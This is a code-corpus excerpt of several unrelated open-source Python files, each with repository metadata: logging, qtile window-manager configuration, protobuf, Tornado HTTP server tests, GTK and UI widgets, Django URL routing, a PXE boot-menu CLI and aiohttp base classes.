library/python/pysandesh/sandesh_logger.py
|
Python
|
apache-2.0
| 6,516
| 0
|
#
# Copyright (c) 2013 Juniper Networks, Inc. All rights reserved.
#
#
# Sandesh Logger
#
import logging
import logging.config
import logging.handlers
from gen_py.sandesh.ttypes import SandeshLevel
import sandesh_base_logger
import util
def create_logger(generator, logger_class, logger_config_file=None):
l_class = util.import_class(logger_class)
return l_class(generator, logger_config_file=logger_config_file)
class SandeshConfigLogger(sandesh_base_logger.SandeshBaseLogger):
"""Sandesh Config Logger Implementation.
This class sets the log config file to the python logging module.
The user should define the log config file as per format defined in [1].
[1] https://docs.python.org/2/library/logging.config.html
"""
def __init__(self, generator, logger_config_file=None):
super(SandeshConfigLogger, self).__init__(generator)
logging.config.fileConfig(logger_config_file)
self._logger = logging.getLogger(generator)
class SandeshLogger(sandesh_base_logger.SandeshBaseLogger):
"""Sandesh Logger Implementation."""
_DEFAULT_LOG_FILE = '<stdout>'
_DEFAULT_SYSLOG_FACILITY = 'LOG_LOCAL0'
def __init__(self, generator, logger_config_file=None):
assert generator, 'SandeshLogger init requires generator name'
super(SandeshLogger, self).__init__(generator)
self._generator = generator
self._logger = logging.getLogger(self._generator)
self._logger.setLevel(
sandesh_base_logger.SandeshBaseLogger.get_py_logger_level(
SandeshLevel.SYS_INFO))
if not len(self._logger.handlers):
# add the handler only once
self._logging_file_handler = logging.StreamHandler()
log_format = logging.Formatter(
'%(asctime)s [%(name)s]: %(message)s',
datefmt='%m/%d/%Y %I:%M:%S %p')
self._logging_file_handler.setFormatter(log_format)
self._logger.addHandler(self._logging_file_handler)
else:
self._logging_file_handler = self._logger.handlers[0]
# end __init__
def set_logging_params(self, enable_local_log=False, category='',
level=SandeshLevel.SYS_INFO, file=_DEFAULT_LOG_FILE,
enable_syslog=False, syslog_facility='LOG_LOCAL0',
enable_trace_print=False, enable_flow_log=False):
self.set_local_logging(enable_local_log)
self.set_logging_category(category)
self.set_logging_level(level)
self.set_logging_file(file)
self.set_logging_syslog(enable_syslog, syslog_facility)
self.set_trace_print(enable_trace_print)
self.set_flow_logging(enable_flow_log)
# end set_logging_params
def set_trace_print(self, enable_trace_print):
if self.is_trace_print_enabled() != enable_trace_print:
self._logger.info('SANDESH: Trace: PRINT: [%s] -> [%s]',
self.is_trace_print_enabled(),
enable_trace_print)
super(SandeshLogger, self).set_trace_print(enable_trace_print)
# end set_trace_print
def set_flow_logging(self, enable_flow_log):
if self.is_flow_logging_enabled() != enable_flow_log:
self._logger.info('SANDESH: Flow Logging: [%s] -> [%s]',
self.is_flow_logging_enabled(),
enable_flow_log)
super(SandeshLogger, self).set_flow_logging(enable_flow_log)
# end set_flow_logging
def set_logging_level(self, level):
if isinstance(level, str):
if level in SandeshLevel._NAMES_TO_VALUES:
level = SandeshLevel._NAMES_TO_VALUES[level]
else:
level = SandeshLevel.SYS_INFO
# get logging level corresponding to sandesh level
try:
logger_level = self._SANDESH_LEVEL_TO_LOGGER_LEVEL[level]
except KeyError:
logger_level = logging.INFO
level = SandeshLevel.SYS_INFO
self._logger.info('SANDESH: Logging: LEVEL: [%s] -> [%s]',
SandeshLevel._VALUES_TO_NAMES[self.logging_level()],
SandeshLevel._VALUES_TO_NAMES[level])
self._logger.setLevel(logger_level)
super(SandeshLogger, self).set_logging_level(level)
# end set_logging_level
def set_logging_file(self, file):
if self.logging_file() != file:
self._logger.info('SANDESH: Logging: FILE: [%s] -> [%s]',
self.logging_file(), file)
self._logger.removeHandler(self._logging_file_handler)
if file == self._DEFAULT_LOG_FILE:
self._logging_file_handler = logging.StreamHandler()
else:
self._logging_file_handler = (
logging.handlers.RotatingFileHandler(
filename=file, maxBytes=5000000, backupCount=10))
log_format = logging.Formatter(
'%(asctime)s [%(name)s]: %(message)s',
datefmt='%m/%d/%Y %I:%M:%S %p')
self._logging_file_handler.setFormatter(log_format)
self._logger.addHandler(self._logging_file_handler)
super(SandeshLogger, self).set_logging_file(file)
# end set_logging_file
def set_logging_syslog(self, enable_syslog, syslog_facility):
if (self.is_syslog_logging_enabled() == enable_syslog and
self.logging_syslog_facility() == syslog_facility):
return
if self.logging_syslog_facility() != syslog_facility:
self._logger.info('SANDESH: Logging: SYSLOG: [%s] -> [%s]',
self.logging_syslog_facility(), syslog_facility)
if self.is_syslog_logging_enabled():
self._logger.removeHandler(self._logging_syslog_handler)
if enable_syslog:
self._logging_syslog_handler = logging.handlers.SysLogHandler(
address="/dev/log",
facility=getattr(logging.handlers.SysLogHandler,
                                 syslog_facility,
                                 logging.handlers.SysLogHandler.LOG_LOCAL0)
)
self._logger.addHandler(self._logging_syslog_handler)
super(SandeshLogger, self).set_logging_syslog(enable_syslog,
syslog_facility)
# end set_logging_syslog
# end class SandeshLogger
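# Illustrative usage sketch (an assumption, not part of the original module):
# obtaining a logger via the create_logger() factory above and applying
# logging parameters. The dotted class path is a guess at what
# util.import_class() expects.
#
# logger = create_logger('my-generator',
#                        'pysandesh.sandesh_logger.SandeshLogger')
# logger.set_logging_params(enable_local_log=True,
#                           level=SandeshLevel.SYS_DEBUG,
#                           file='/var/log/my-generator.log')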
|
andrelaszlo/qtile
|
examples/config/tailhook-config.py
|
Python
|
mit
| 6,113
| 0.003278
|
# -*- coding: utf-8 -*-
from libqtile.manager import Key, Click, Drag, Screen, Group
from libqtile.command import lazy
from libqtile import layout, bar, widget, hook
from libqtile import xcbq
xcbq.keysyms["XF86AudioRaiseVolume"] = 0x1008ff13
xcbq.keysyms["XF86AudioLowerVolume"] = 0x1008ff11
xcbq.keysyms["XF86AudioMute"] = 0x1008ff12
def window_sorter(win):
patterns = (
('Яндекс.Почта', 'E-mail'),
('Gmail', 'E-mail'),
('SquirrelMail', 'E-mail'),
('zeromq', 'Docs'),
('PyYAML', 'Docs'),
('documentation', 'Docs'),
('-ietf-', 'Docs'),
('GNOME Live!', 'Docs'),
('Guide', 'Docs'),
)
for k, v in patterns:
if k in win.name:
return v
mod = "mod4"
keys = [
Key([mod], "j",
lazy.layout.down()),
Key([mod], "k",
lazy.layout.up()),
Key([mod, "shift"], "j",
lazy.layout.move_down()),
Key([mod, "shift"], "k",
lazy.layout.move_up()),
Key([mod, "control"], "j",
lazy.layout.section_down()),
Key([mod, "control"], "k",
lazy.layout.section_up()),
Key([mod], "h",
lazy.layout.collapse_branch()), # for tree layout
Key([mod], "l",
lazy.layout.expand_branch()), # for tree layout
Key([mod], "r",
lazy.layout.sort_windows(window_sorter)), # for tree layout
Key([mod, "shift"], "h",
lazy.layout.move_left()),
Key([mod, "shift"], "l",
lazy.layout.move_right()),
Key([mod, "control"], "l",
lazy.layout.increase_ratio()),
Key([mod, "control"], "h",
lazy.layout.decrease_ratio()),
Key([mod], "comma",
lazy.layout.increase_nmaster()),
Key([mod], "period",
lazy.layout.decrease_nmaster()),
Key([mod], "Tab",
lazy.group.next_window()),
Key([mod, "shift"], "Tab",
lazy.group.prev_window()),
Key([mod, "shift"], "Return",
lazy.layout.rotate()),
Key([mod, "shift"], "space",
lazy.layout.toggle_split()),
Key([mod], "w",
lazy.to_screen(0)),
Key([mod], "e",
lazy.to_screen(1)),
Key([mod], "space",
lazy.nextlayout()),
Key([mod], "c",
lazy.window.kill()),
Key([mod], "t",
lazy.window.disable_floating()),
Key([mod, "shift"], "t",
lazy.window.enable_floating()),
Key([mod], "p",
lazy.spawn("exec dmenu_run "
"-fn 'Consolas:size=13' -nb '#000000' -nf '#ffffff' -b")),
Key([mod], "b",
lazy.spawn("~/note/conf/uzbl/open_history")),
Key([mod, "shift"], "b",
lazy.spawn("~/note/conf/uzbl/open_bookmark")),
Key([mod], "s",
lazy.spawn("~/note/conf/uzbl/open_ddg")),
Key([mod, "shift"], "s",
lazy.spawn("~/note/conf/uzbl/open_goog")),
Key([mod], "q",
lazy.spawn('xtrlock')),
Key([mod], "y",
lazy.spawn('xclip -o -selection primary | xclip -selection clipboard')),
Key([mod], "u",
lazy.spawn('xclip -o -selection clipboard | xclip -selection primary')),
Key([], "XF86AudioRaiseVolume",
lazy.spawn("amixer sset Master 5%+")),
Key([], "XF86AudioLowerVolume",
lazy.spawn("amixer sset Master 5%-")),
Key([], "XF86AudioMute",
lazy.spawn("amixer sset Master toggle")),
Key(["shift"], "XF86AudioRaiseVolume",
lazy.spawn("mpc volume +5")),
Key(["shift"], "XF86AudioLowerVolume",
lazy.spawn("mpc volume -5")),
Key(["shift"], "XF86AudioMute",
lazy.spawn("mpc toggle")),
Key([mod], "Left",
lazy.prevgroup()),
Key([mod], "Right",
lazy.nextgroup()),
]
mouse = [
Drag([mod], "Button1", lazy.window.set_position_floating(),
start=lazy.window.get_position()),
Drag([mod], "Button3", lazy.window.set_size_floating(),
start=lazy.window.get_size()),
Click([mod], "Button2", lazy.window.bring_to_front())
]
border = dict(
border_normal='#808080',
border_width=2,
)
layouts = [
layout.Tile(**border),
layout.Max(),
layout.Stack(**border),
layout.TreeTab(sections=['Surfing', 'E-mail', 'Docs', 'Incognito']),
layout.Slice('left', 320, wmclass='pino',
fallback=layout.Slice('right', 320, role='roster',
                 fallback=layout.Stack(1, **border))),
layout.Slice('left', 192, role='gimp-toolbox',
fallback=layout.Slice('right', 256, role='gimp-dock',
fallback=layout.Stack(1, **border))),
]
floating_layout = layout.Floating(**border)
groups = [
Group('1'),
    Group('2', layout='max'),
Group('3'),
Group('4', layout='treetab'),
Group('5'),
Group('6'),
Group('7'),
Group('8'),
Group('9'),
]
for i in groups:
keys.append(
Key([mod], i.name, lazy.group[i.name].toscreen())
)
keys.append(
Key([mod, "shift"], i.name, lazy.window.togroup(i.name))
)
screens = [
Screen(
top = bar.Bar(
[
widget.GroupBox(borderwidth=2,
font='Consolas',fontsize=18,
padding=1, margin_x=1, margin_y=1),
widget.Sep(),
widget.WindowName(
font='Consolas',fontsize=18, margin_x=6),
widget.Sep(),
widget.Battery(
font='Consolas',fontsize=18, margin_x=6),
widget.Sep(),
widget.CPUGraph(),
widget.MemoryGraph(),
widget.SwapGraph(foreground='C02020'),
widget.Sep(),
widget.Systray(),
widget.Sep(),
widget.Clock('%H:%M:%S %d.%m.%Y',
font='Consolas', fontsize=18, padding=6),
],
24,
),
),
]
@hook.subscribe.client_new
def dialogs(window):
if(window.window.get_wm_type() == 'dialog'
or window.window.get_wm_transient_for()):
window.floating = True
|
Mickey32111/pogom
|
pogom/pgoapi/protos/POGOProtos/Networking/Requests/Messages/CollectDailyDefenderBonusMessage_pb2.py
|
Python
|
mit
| 2,108
| 0.010436
|
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: POGOProtos/Networking/Requests/Messages/CollectDailyDefenderBonusMessage.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='POGOProtos/Networking/Requests/Messages/CollectDailyDefenderBonusMessage.proto',
package='POGOProtos.Networking.Requests.Messages',
syntax='proto3',
serialized_pb=_b('\nNPOGOProtos/Networking/Requests/Messages/CollectDailyDefenderBonusMessage.proto\x12\'POGOProtos.Networking.Requests.Messages\"\"\n CollectDailyDefenderBonusMessageb\x06proto3')
)
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_COLLECTDAILYDEFENDERBONUSMESSAGE = _descriptor.Descriptor(
name='CollectDailyDefenderBonusMessage',
full_name='POGOProtos.Networking.Requests.Messages.CollectDailyDefenderBonusMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
  fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
  extension_ranges=[],
oneofs=[
],
serialized_start=123,
serialized_end=157,
)
DESCRIPTOR.message_types_by_name['CollectDailyDefenderBonusMessage'] = _COLLECTDAILYDEFENDERBONUSMESSAGE
CollectDailyDefenderBonusMessage = _reflection.GeneratedProtocolMessageType('CollectDailyDefenderBonusMessage', (_message.Message,), dict(
DESCRIPTOR = _COLLECTDAILYDEFENDERBONUSMESSAGE,
__module__ = 'POGOProtos.Networking.Requests.Messages.CollectDailyDefenderBonusMessage_pb2'
# @@protoc_insertion_point(class_scope:POGOProtos.Networking.Requests.Messages.CollectDailyDefenderBonusMessage)
))
_sym_db.RegisterMessage(CollectDailyDefenderBonusMessage)
# @@protoc_insertion_point(module_scope)
|
mr-ping/tornado
|
tornado/test/httpserver_test.py
|
Python
|
apache-2.0
| 41,934
| 0.000501
|
#!/usr/bin/env python
from __future__ import absolute_import, division, print_function, with_statement
from tornado import netutil
from tornado.escape import json_decode, json_encode, utf8, _unicode, recursive_unicode, native_str
from tornado import gen
from tornado.http1connection import HTTP1Connection
from tornado.httpserver import HTTPServer
from tornado.httputil import HTTPHeaders, HTTPMessageDelegate, HTTPServerConnectionDelegate, ResponseStartLine
from tornado.iostream import IOStream
from tornado.log import gen_log
from tornado.netutil import ssl_options_to_context
from tornado.simple_httpclient import SimpleAsyncHTTPClient
from tornado.testing import AsyncHTTPTestCase, AsyncHTTPSTestCase, AsyncTestCase, ExpectLog, gen_test
from tornado.test.util import unittest, skipOnTravis
from tornado.web import Application, RequestHandler, asynchronous, stream_request_body
from contextlib import closing
import datetime
import gzip
import os
import shutil
import socket
import ssl
import sys
import tempfile
from io import BytesIO
def read_stream_body(stream, callback):
"""Reads an HTTP response from `stream` and runs callback with its
headers and body."""
chunks = []
class Delegate(HTTPMessageDelegate):
def headers_received(self, start_line, headers):
self.headers = headers
def data_received(self, chunk):
chunks.append(chunk)
def finish(self):
callback((self.headers, b''.join(chunks)))
conn = HTTP1Connection(stream, True)
conn.read_response(Delegate())
class HandlerBaseTestCase(AsyncHTTPTestCase):
def get_app(self):
return Application([('/', self.__class__.Handler)])
def fetch_json(self, *args, **kwargs):
response = self.fetch(*args, **kwargs)
response.rethrow()
return json_decode(response.body)
class HelloWorldRequestHandler(RequestHandler):
def initialize(self, protocol="http"):
self.expected_protocol = protocol
def get(self):
if self.request.protocol != self.expected_protocol:
raise Exception("unexpected protocol")
self.finish("Hello world")
def post(self):
self.finish("Got %d bytes in POST" % len(self.request.body))
# In pre-1.0 versions of openssl, SSLv23 clients always send SSLv2
# ClientHello messages, which are rejected by SSLv3 and TLSv1
# servers. Note that while the OPENSSL_VERSION_INFO was formally
# introduced in python3.2, it was present but undocumented in
# python 2.7
skipIfOldSSL = unittest.skipIf(
getattr(ssl, 'OPENSSL_VERSION_INFO', (0, 0)) < (1, 0),
"old version of ssl module and/or openssl")
class BaseSSLTest(AsyncHTTPSTestCase):
def get_app(self):
return Application([('/', HelloWorldRequestHandler,
dict(protocol="https"))])
class SSLTestMixin(object):
def get_ssl_options(self):
return dict(ssl_version=self.get_ssl_version(), # type: ignore
**AsyncHTTPSTestCase.get_ssl_options())
def get_ssl_version(self):
raise NotImplementedError()
def test_ssl(self):
response = self.fetch('/')
self.assertEqual(response.body, b"Hello world")
def test_large_post(self):
response = self.fetch('/',
method='POST',
body='A' * 5000)
self.assertEqual(response.body, b"Got 5000 bytes in POST")
def test_non_ssl_request(self):
# Make sure the server closes the connection when it gets a non-ssl
# connection, rather than waiting for a timeout or otherwise
# misbehaving.
        with ExpectLog(gen_log, '(SSL Error|uncaught exception)'):
with ExpectLog(gen_log, 'Uncaught exception', required=False):
self.http_client.fetch(
self.get_url("/").replace('https:', 'http:'),
self.stop,
                    request_timeout=3600,
connect_timeout=3600)
response = self.wait()
self.assertEqual(response.code, 599)
def test_error_logging(self):
# No stack traces are logged for SSL errors.
with ExpectLog(gen_log, 'SSL Error') as expect_log:
self.http_client.fetch(
self.get_url("/").replace("https:", "http:"),
self.stop)
response = self.wait()
self.assertEqual(response.code, 599)
self.assertFalse(expect_log.logged_stack)
# Python's SSL implementation differs significantly between versions.
# For example, SSLv3 and TLSv1 throw an exception if you try to read
# from the socket before the handshake is complete, but the default
# of SSLv23 allows it.
class SSLv23Test(BaseSSLTest, SSLTestMixin):
def get_ssl_version(self):
return ssl.PROTOCOL_SSLv23
@skipIfOldSSL
class SSLv3Test(BaseSSLTest, SSLTestMixin):
def get_ssl_version(self):
return ssl.PROTOCOL_SSLv3
@skipIfOldSSL
class TLSv1Test(BaseSSLTest, SSLTestMixin):
def get_ssl_version(self):
return ssl.PROTOCOL_TLSv1
@unittest.skipIf(not hasattr(ssl, 'SSLContext'), 'ssl.SSLContext not present')
class SSLContextTest(BaseSSLTest, SSLTestMixin):
def get_ssl_options(self):
context = ssl_options_to_context(
AsyncHTTPSTestCase.get_ssl_options(self))
assert isinstance(context, ssl.SSLContext)
return context
class BadSSLOptionsTest(unittest.TestCase):
def test_missing_arguments(self):
application = Application()
self.assertRaises(KeyError, HTTPServer, application, ssl_options={
"keyfile": "/__missing__.crt",
})
def test_missing_key(self):
"""A missing SSL key should cause an immediate exception."""
application = Application()
module_dir = os.path.dirname(__file__)
existing_certificate = os.path.join(module_dir, 'test.crt')
existing_key = os.path.join(module_dir, 'test.key')
self.assertRaises((ValueError, IOError),
HTTPServer, application, ssl_options={
"certfile": "/__mising__.crt",
})
self.assertRaises((ValueError, IOError),
HTTPServer, application, ssl_options={
"certfile": existing_certificate,
"keyfile": "/__missing__.key"
})
# This actually works because both files exist
HTTPServer(application, ssl_options={
"certfile": existing_certificate,
"keyfile": existing_key,
})
class MultipartTestHandler(RequestHandler):
def post(self):
self.finish({"header": self.request.headers["X-Header-Encoding-Test"],
"argument": self.get_argument("argument"),
"filename": self.request.files["files"][0].filename,
"filebody": _unicode(self.request.files["files"][0]["body"]),
})
# This test is also called from wsgi_test
class HTTPConnectionTest(AsyncHTTPTestCase):
def get_handlers(self):
return [("/multipart", MultipartTestHandler),
("/hello", HelloWorldRequestHandler)]
def get_app(self):
return Application(self.get_handlers())
def raw_fetch(self, headers, body, newline=b"\r\n"):
with closing(IOStream(socket.socket())) as stream:
stream.connect(('127.0.0.1', self.get_http_port()), self.stop)
self.wait()
stream.write(
newline.join(headers +
[utf8("Content-Length: %d" % len(body))]) +
newline + newline + body)
read_stream_body(stream, self.stop)
headers, body = self.wait()
return body
def test_multipart_form(self):
# Encodings here are tricky: Headers are latin1, bodies can be
# anything (we use utf8 by default).
response = self.raw_fetch([
b"POST /multipart HTTP/1.0",
b"Content-Type: multipart/form-data; boundary=1234567890",
b"X-Header-encoding-test: \xe9"
|
klausweiss/python-aui
|
aui/widgets.py
|
Python
|
bsd-2-clause
| 4,207
| 0.000475
|
import sys
# widgets
class Button:
"""
Represents button
Keyword arguments:
text -- button text
| str
onclick -- function invoked after pressing the button
| function: Button -> void
Attributes:
wide -- makes the button wide
"""
def __new__(cls, text=None, onclick=None):
return object.__new__(sys.modules['aui.widgets'].Button)
def __init__(self, text, onclick=None):
self.wide = self
def destroy(self):
"""Destroys the button"""
pass
class Checkbox:
"""
Represents checkbox in UI
Keyword arguments:
text -- checkbox text
| str
selected -- whether the checkbox is selected on init
| boolean
onchange -- function invoked after toggling the checkbox
| function: Checkbox -> void
"""
def __new__(cls, text=None, selected=False, onchange=None, *args):
return object.__new__(sys.modules['aui.widgets'].Checkbox)
def __init__(self, text, selected=False, onchange=None):
pass
def destroy(self):
"""Destroys the checkbox"""
pass
class Input:
"""
Represents input field in UI
Keyword arguments:
    value -- default value
| str (default: "")
onenter -- function called after the return key is pressed
| function: Input -> void
Attributes:
wide -- makes the input wide
"""
def __new__(cls, value="", onenter=None, *args):
return object.__new__(sys.modules['aui.widgets'].Input)
def __init__(self, value="", onenter=None):
self.wide = self
def destroy(self):
"""Destroys the input
|
field"""
pass
class Label:
"""
Represents label in UI
Keyword arguments:
text -- label text
| str
"""
def __new__(cls, text=None, *args):
return object.__new__(sys.modules['aui.widgets'].Label)
def __init__(self, text):
pass
def destroy(self):
"""Destroys the label"""
pass
class Text:
"""
Represents multiline input field in UI
Keyword arguments:
text -- widget text
| str (default: "")
"""
def __new__(cls, text=None, *args):
return object.__new__(sys.modules['aui.widgets'].Text)
def __init__(self, text=""):
pass
def destroy(self):
"""Destroys the text field"""
pass
# containers
class Vertical:
"""
Represents vertical container in UI
Arguments:
*children -- children elements of the container
"""
def __new__(cls, *args):
return object.__new__(sys.modules['aui.widgets'].Vertical)
def append(self, child):
"""
Appends widget to the vertical container
Keyword arguments:
child -- the widget to be placed into the container
"""
pass
def create(self, parent, align=None):
"""
Creates vertical container and assigns it to its parent
Keyword arguments:
parent -- parent of the element to be put into
align -- alignment of the element in container tk.constants.(TOP/RIGHT/BOTTOM/LEFT)
"""
pass
def destroy(self):
"""Destroys the vertical container"""
pass
class Horizontal:
"""
Represents horizontal container in UI
Arguments:
*children -- children elements of the container
"""
def __new__(cls, *args):
return object.__new__(sys.modules['aui.widgets'].Horizontal)
def append(self, child):
"""
Appends widget to the horizontal container
Keyword arguments:
child -- the widget to be placed into the container
"""
pass
def create(self, parent, align=None):
"""
Creates horizontal container and assigns it to its parent
Keyword arguments:
parent -- parent of the element to be put into
align -- alignment of the element in container tk.constants.(TOP/RIGHT/BOTTOM/LEFT)
"""
pass
def destroy(self):
"""Destroys the horizontal container"""
pass
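# Usage sketch (illustrative, not part of the original module): composing the
# stub widgets above into a simple form. The `parent` argument is assumed to
# be a Tk container, as hinted by the tk.constants reference in create().
def _example_form(parent):
    def on_ok(button):
        print("form submitted")
    layout = Vertical(
        Label(text="Sign in"),
        Input(value="user@example.com"),
        Checkbox(text="Remember me", selected=True),
        Button(text="OK", onclick=on_ok),
    )
    layout.create(parent)
    return layout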
|
linuxdeepin/deepin-ui
|
dtk/ui/cycle_strip.py
|
Python
|
gpl-3.0
| 2,087
| 0.001917
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) 2011 ~ 2012 Deepin, Inc.
# 2011 ~ 2012 Wang Yong
#
# Author: Wang Yong <lazycat.manatee@gmail.com>
# Maintainer: Wang Yong <lazycat.manatee@gmail.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import gtk
import gobject
from cache_pixbuf import CachePixbuf
from draw import draw_pixbuf
class CycleStrip(gtk.HBox):
'''
CycleStrip class.
    This widget draws a cyclically repeating background, using CachePixbuf to accelerate rendering.
@undocumented: expose_cycle_strip
'''
def __init__(self, background_dpixbuf):
'''
Initialize CycleStrip class.
        @param background_dpixbuf: DynamicPixbuf background.
'''
gtk.HBox.__init__(self)
self.background_dpixbuf = background_dpixbuf
self.cache_pixbuf = CachePixbuf()
self.set_size_request(-1, self.background_dpixbuf.get_pixbuf().get_height())
self.connect("expose-event", self.expose_cycle_strip)
def expose_cycle_strip(self, widget, event):
# Init.
        cr = widget.window.cairo_create()
rect = widget.allocation
background_pixbuf = self.background_dpixbuf.get_pixbuf()
self.cache_pixbuf.scale(
background_pixbuf,
rect.width,
rect.height)
draw_pixbuf(
cr,
self.cache_pixbuf.get_cache(),
rect.x,
rect.y)
return False
gobject.type_register(CycleStrip)
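# Usage sketch, kept as comments since it needs a live deepin-ui/GTK session:
# `background_dpixbuf` is assumed to be a DynamicPixbuf (e.g. one taken from
# dtk.ui.theme.ui_theme); the strip packs into layouts like any gtk.HBox.
#
#   strip = CycleStrip(background_dpixbuf)
#   main_box = gtk.VBox()
#   main_box.pack_start(strip, False, False)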
|
mfogel/django-signup-login
|
signup_login/urls.py
|
Python
|
bsd-3-clause
| 1,287
| 0.006993
|
from django.conf.urls.defaults import *
from .views import *
urlpatterns = patterns('',
url(r'^signup/$',
view=SignupLoginView.as_view(
featured_form_mixin_class=SignupMultipleFormMixin),
name='accounts_signup'
),
url(r'^login/$',
view=SignupLoginView.as_view(
featured_form_mixin_class=LoginMultipleFormMixin),
name='accounts_login'
),
url(r'^signup-login/$',
view=SignupLoginView.as_view(),
name='accounts_signup_login'
),
url(r'^iframes/signup/$',
        view=SignupLoginIframeView.as_view(
            featured_form_mixin_class=SignupIframeMultipleFormMixin),
        name='accounts_signup_iframe'
    ),
url(r'^iframes/login/$',
view=SignupLoginIframeView.as_view(
featured_form_mixin_class=LoginIframeMultipleFormMixin),
name='accounts_login_iframe'
),
url(r'^iframes/signup-login/$',
view=SignupLoginIframeView.as_view(),
name='accounts_signup_login_iframe'
),
url(r'^iframes/signup-login/success/$',
view=SignupLoginSuccessIframeView.as_view(),
name='accounts_signup_login_success_iframe'
),
url(r'^logout/$',
view=LogoutView.as_view(),
name='accounts_logout'
),
)
|
ERPXE/erpxe
|
erpxe/cli.py
|
Python
|
gpl-3.0
| 2,519
| 0.030171
|
# import the ERPXE core API
import core
# Global variables
TFTPBOOT_DIR = "/tftpboot"
PLUGINS_DIR = TFTPBOOT_DIR + "/er/plugins"
# try to load configuration from file system or use defaults
def load_configuration():
# try to fetch configuration from file
try:
config = core.get_configuration()
except:
print "error loading "
load_configuration()
# parse CLI arguments
def cli(arguments):
verbose = arguments['--verbose']
if arguments['list']:
show_plugins()
elif arguments['status']:
print_status()
elif arguments['render']:
generate_menu()
elif arguments['enable']:
plugin = arguments['<plugin>']
enable(plugin)
elif arguments['disable']:
plugin = arguments['<plugin>']
disable(plugin)
def print_status():
import os.path
# print some pre-status header
print "ERPXE v2.0"
# test folders
print "TFTPBOOT path: " + TFTPBOOT_DIR
if os.path.isdir(TFTPBOOT_DIR):
print "directory found."
print "Plugins path: " + PLUGINS_DIR
if os.path.isdir(PLUGINS_DIR):
print "directory found."
def show_plugins():
plugins = core.get_plugins_list(PLUGINS_DIR)
if plugins:
print "Installed plugins:"
for plugin in plugins:
if plugin['deactivated']:
print plugin['name'] + " (disabled) "
else:
print plugin['name']
# Generate Menu files inside the TFTPBOOT folder.
def generate_menu():
    try:
        core.get_configuration()
    except Exception, e:
        print str(e)
        print "missing configuration file. use 'erpxe create-configuration-file' command to create one from template"
        return
    core.generate_menu(TFTPBOOT_DIR, PLUGINS_DIR)
    print "ERPXE menu rendered successfully"
def similar(PLUGIN):
from difflib import SequenceMatcher
plugins = core.get_plugins_list(PLUGINS_DIR)
bestName = ''
bestScore = 0
for plugin in plugins:
score = SequenceMatcher(None, PLUGIN.lower(), plugin['name'].lower()).ratio()
if score > bestScore and score > .5:
bestScore = score
bestName = plugin['name']
if bestScore > 0:
print "maybe you meant: " + bestName + " ?"
# Enable plugin
def enable(PLUGIN):
    if not core.is_plugin_exist(PLUGINS_DIR, PLUGIN):
        print "plugin does not exist"
        return similar(PLUGIN)
core.enable_plugin(TFTPBOOT_DIR, PLUGINS_DIR, PLUGIN)
# Disable plugin
def disable(PLUGIN):
    if not core.is_plugin_exist(PLUGINS_DIR, PLUGIN):
        print "plugin does not exist"
        return similar(PLUGIN)
core.disable_plugin(TFTPBOOT_DIR, PLUGINS_DIR, PLUGIN)
print "Plugin disabled"
|
mitodl/django-server-status
|
server_status/tests/urls.py
|
Python
|
agpl-3.0
| 328
| 0
|
"""URLs to run the tests."""
try:
from django.urls import include
except ImportError:
    from django.conf.urls import include
from django.conf.urls import url
from django.contrib import admin
admin.autodiscover()
urlpatterns = (
url(r'^admin/', admin.site.urls),
url(r'^status', include('server_status.urls')),
)
|
r41d/pytradfri
|
pytradfri/mood.py
|
Python
|
mit
| 383
| 0
|
"""Represent a mood on the gateway."
|
""
from .const import ROOT_MOODS
from .resource import ApiResource
class Mood(ApiResource):
def __init__(self, raw, parent):
super().__init__(raw)
self._parent = parent
@property
def path(self):
        return [ROOT_MOODS, self._parent, self.id]
def __repr__(self):
return '<Mood {}>'.format(self.name)
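# Usage sketch (comments only; `raw` is assumed to be a mood dict fetched from
# the gateway and `parent` the id of the owning mood group):
#   mood = Mood(raw, parent)
#   mood.path  # -> [ROOT_MOODS, parent, mood.id]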
|
juliatem/aiohttp
|
aiohttp/abc.py
|
Python
|
apache-2.0
| 3,396
| 0
|
import asyncio
import sys
from abc import ABC, abstractmethod
from collections.abc import Iterable, Sized
PY_35 = sys.version_info >= (3, 5)
class AbstractRouter(ABC):
    def __init__(self):
self._frozen = False
    def post_init(self, app):
"""Post init stage.
Not an abstract method for sake of backward compatibility,
but if the router wants to be aware of the application
it can override this.
"""
@property
def frozen(self):
return self._frozen
def freeze(self):
"""Freeze router."""
self._frozen = True
@asyncio.coroutine # pragma: no branch
@abstractmethod
def resolve(self, request):
"""Return MATCH_INFO for given request"""
class AbstractMatchInfo(ABC):
@asyncio.coroutine # pragma: no branch
@abstractmethod
def handler(self, request):
"""Execute matched request handler"""
@asyncio.coroutine # pragma: no branch
@abstractmethod
def expect_handler(self, request):
"""Expect handler for 100-continue processing"""
@property # pragma: no branch
@abstractmethod
def http_exception(self):
"""HTTPException instance raised on router's resolving, or None"""
@abstractmethod # pragma: no branch
def get_info(self):
"""Return a dict with additional info useful for introspection"""
@property # pragma: no branch
@abstractmethod
def apps(self):
"""Stack of nested applications.
Top level application is left-most element.
"""
@abstractmethod
def add_app(self, app):
"""Add application to the nested apps stack."""
@abstractmethod
def freeze(self):
"""Freeze the match info.
The method is called after route resolution.
After the call .add_app() is forbidden.
"""
class AbstractView(ABC):
def __init__(self, request):
self._request = request
@property
def request(self):
return self._request
@asyncio.coroutine # pragma: no branch
@abstractmethod
def __iter__(self):
while False: # pragma: no cover
yield None
if PY_35: # pragma: no branch
@abstractmethod
def __await__(self):
return # pragma: no cover
class AbstractResolver(ABC):
@asyncio.coroutine # pragma: no branch
@abstractmethod
